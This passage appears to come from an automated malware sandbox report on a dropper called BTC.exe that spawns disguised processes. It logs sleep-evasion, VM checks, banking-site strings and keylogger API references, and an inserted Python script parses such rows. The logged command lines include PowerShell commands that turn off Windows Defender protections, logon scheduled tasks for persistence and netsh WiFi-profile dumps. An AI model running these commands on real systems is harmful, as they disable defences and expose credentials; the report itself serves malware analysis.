                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 595500
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 595390
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 595281
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 595171
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 595062
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 594953
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 594843
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 594734
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 594625
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 594515
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 594406
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 594297
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 594182
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 594062
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 593953
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 593838
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 593719
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 593605
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 593472
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 593344
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 593234
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 593125
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 593016
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 592904
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 592793
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 922337203685477
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: discord.comVMware20,11696428655f
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                            Source: svchost.exe, 00000004.00000002.4526855238.0000000005B60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlllightSavingsTime
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: global block list test formVMware20,11696428655
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
                            Source: Window Security.exe, 00000057.00000002.2595221845.0000000000C7C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y,
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                            Source: crack.exe, 00000002.00000002.2042909870.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2834850034.0000000001375000.00000004.00000020.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4454908243.000000000079D000.00000004.00000020.00020000.00000000.sdmp, Windows Security Health Service.exe, 0000001A.00000002.4563359135.000000001B7C3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: AMC password management pageVMware20,11696428655
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
                            Source: Window Security.exe, 00000057.00000002.2595221845.0000000000C7C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yw
                            Source: svchost.exe.0.dr | Binary or memory string: vmware
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
                            Source: Windows Defender Service Host.exe, 00000007.00000002.4537546476.000000001C1A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                            Source: Window Security.exe, 0000005D.00000002.2725226506.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                            Source: update.exe, 00000005.00000002.4556173792.00000000056DD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllne
                            Source: svchost.exe.0.dr | Binary or memory string: VMwareVBox
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
                            Source: BTC.exe, 00000000.00000002.2010201525.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                            Source: tmpFF2F.tmp.dat.4.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
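The thread-delay rows, the VMware/VirtualBox/Hyper-V memory strings and the "Process token adjusted: Debug" rows in this section are the raw evidence behind the report's sandbox-evasion and anti-debug signatures. The Python below is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: it parses rows in this report's fused `Source: <source><observation>: <detail>` shape (a ` | ` between source and observation is accepted as well), drops the trailing `Jump to behavior` link text, and triages what it finds. A delay of 922337203685477 ms equals TimeSpan.MaxValue expressed in milliseconds (Int64.MaxValue ticks of 100 ns divided by 10,000), i.e. an effectively unbounded sleep; runs of sleeps that shrink by a small step each time (600000, 599881, 599750, ...) are reported as countdown sequences; memory strings naming a hypervisor are counted as VM artifacts. The one-minute long-sleep threshold, the hypervisor marker list, the reading of the "Debug" token adjustment as SeDebugPrivilege being enabled, and the sample rows (constructed to match rows in this section) are assumptions of the example, not statements the report makes.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# 922337203685477 ms == TimeSpan.MaxValue (Int64.MaxValue ticks of 100 ns) in milliseconds:
# a sleep of that length is effectively unbounded.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000
LONG_SLEEP_MS = 60_000           # assumed threshold: one minute outlasts a short detonation window
VM_MARKERS = ("vmware", "vmwar", "vbox", "virtualbox", "hyper-v", "qemu", "xen")  # assumed list

# The report fuses the Source column onto the observation text, so the observation keyword is
# the only reliable separator. A " | " between the two is accepted too; link text is dropped.
ROW_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*(?:\|\s*)?"
    r"(?P<obs>Thread delayed|Binary or memory string|Process token adjusted"
    r"|File Volume queried|Process information queried|Code function)"
    r":\s*(?P<detail>.*?)\s*(?:Jump to behavior)?$"
)


def parse_row(line: str) -> Optional[Dict[str, str]]:
    """Split one report row into source, observation kind and detail; None for non-rows."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    return {"src": m["src"].strip(), "obs": m["obs"], "detail": m["detail"].strip()}


def delay_ms(rec: Dict[str, str]) -> int:
    return int(rec["detail"].rsplit(":", 1)[1])      # "delay time: 600000" -> 600000


def classify(rec: Dict[str, str]) -> str:
    obs, detail = rec["obs"], rec["detail"]
    if obs == "Thread delayed":
        ms = delay_ms(rec)
        if ms >= TIMESPAN_MAX_MS:
            return "sleep:unbounded"
        return "sleep:long" if ms >= LONG_SLEEP_MS else "sleep:short"
    if obs == "Binary or memory string":
        low = detail.lower()
        return "vm-artifact" if any(k in low for k in VM_MARKERS) else "string:other"
    if obs == "Process token adjusted" and detail == "Debug":
        # Assumption: the "Debug" token adjustment is SeDebugPrivilege being enabled.
        return "anti-debug:SeDebugPrivilege"
    return "other"


def countdown_runs(records, min_len: int = 3, max_step_ms: int = 1_000):
    """Per source, find runs of consecutive sleeps that each shrink by at most max_step_ms
    (600000, 599881, 599750, ...). Returned as (first_ms, last_ms, length) tuples."""
    per_src: Dict[str, List[int]] = defaultdict(list)
    for r in records:
        if r["obs"] == "Thread delayed":
            per_src[r["src"]].append(delay_ms(r))
    runs: Dict[str, List[Tuple[int, int, int]]] = {}
    for src, vals in per_src.items():
        i = 0
        while i < len(vals):
            j = i
            while j + 1 < len(vals) and 0 < vals[j] - vals[j + 1] <= max_step_ms:
                j += 1
            if j - i + 1 >= min_len:
                runs.setdefault(src, []).append((vals[i], vals[j], j - i + 1))
            i = j + 1
    return runs


def summarize(lines):
    """Count each evasion category, list countdown runs and the processes that took SeDebugPrivilege."""
    records = [r for r in map(parse_row, lines) if r]
    counts = defaultdict(int)
    for r in records:
        counts[classify(r)] += 1
    debug = sorted({r["src"] for r in records if classify(r) == "anti-debug:SeDebugPrivilege"})
    return {"counts": dict(counts), "countdowns": countdown_runs(records),
            "debug_priv_processes": debug}


# Constructed sample rows in the shape of this section's rows (sample input, not report output).
SAMPLE_ROWS = r"""
Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 599881Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 599750Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 100000Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99874Jump to behavior
Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Thread delayed: delay time: 922337203685477
Source: tmpFF2F.tmp.dat.4.drBinary or memory string: discord.comVMware20,11696428655f
Source: svchost.exe.0.drBinary or memory string: VMwareVBox
Source: svchost.exe, 00000004.00000002.4526855238.0000000005B60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Roaming\crack.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Roaming\update.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information queried: ProcessInformationJump to behavior
"""

if __name__ == "__main__":
    import json
    print(json.dumps(summarize(SAMPLE_ROWS.splitlines()), indent=2))
```

Feed it the behaviour rows of a report (one row per line) and it returns how many unbounded and long sleeps were seen, which processes sleep in countdown runs, which memory strings name a hypervisor, and which processes adjusted their token for debug. The countdown grouping is only a pattern over the reported values; whether a given run is a loop re-issuing the remaining time is an interpretation the report itself does not make.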
                            Source: C:\Users\user\AppData\Roaming\Cracked.exe | Process information queried: ProcessInformation
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 4_2_05C10B20 LdrInitializeThunk,4_2_05C10B20
                            Source: C:\Users\user\AppData\Roaming\crack.exe | Process token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Cracked.exe | Process token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Cracked.exe | Process token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | Process token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\update.exe | Process token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Process token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Process token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Process token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Process token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Process token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Process token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Process token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\BTC.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\svchost.exe | Network Connect: 149.154.167.220 443
Source: C:\Users\user\AppData\Roaming\svchost.exe | Network Connect: 104.16.185.241 80
Source: C:\Users\user\AppData\Roaming\svchost.exe | Network Connect: 172.67.196.114 443
Source: Yara match | File source: Process Memory Space: Window Security.exe PID: 2680, type: MEMORYSTR
Source: Cracked.exe.0.dr, Keylogger.cs | Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: Cracked.exe.0.dr, DInvokeCore.cs | Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: Cracked.exe.0.dr, AntiProcess.cs | Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
Source: Windows Defender Service Host.exe.0.dr, Messages.cs | Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
Source: C:\Users\user\Desktop\BTC.exe | Process created: C:\Users\user\AppData\Roaming\crack.exe "C:\Users\user\AppData\Roaming\crack.exe"
Source: C:\Users\user\Desktop\BTC.exe | Process created: C:\Users\user\AppData\Roaming\Cracked.exe "C:\Users\user\AppData\Roaming\Cracked.exe"
Source: C:\Users\user\Desktop\BTC.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\Desktop\BTC.exe | Process created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe"
Source: C:\Users\user\Desktop\BTC.exe | Process created: C:\Users\user\AppData\Roaming\Window Security.exe "C:\Users\user\AppData\Roaming\Window Security.exe"
Source: C:\Users\user\Desktop\BTC.exe | Process created: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
Source: C:\Users\user\AppData\Roaming\crack.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE49C.tmp.cmd""
Source: C:\Users\user\AppData\Roaming\Cracked.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exit
Source: C:\Users\user\AppData\Roaming\Cracked.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE306.tmp.bat""
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
Source: C:\Users\user\AppData\Roaming\update.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Users\user\AppData\Roaming\update.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\Window Security.exe" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe "C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe"
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-MpPreference -verbose
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
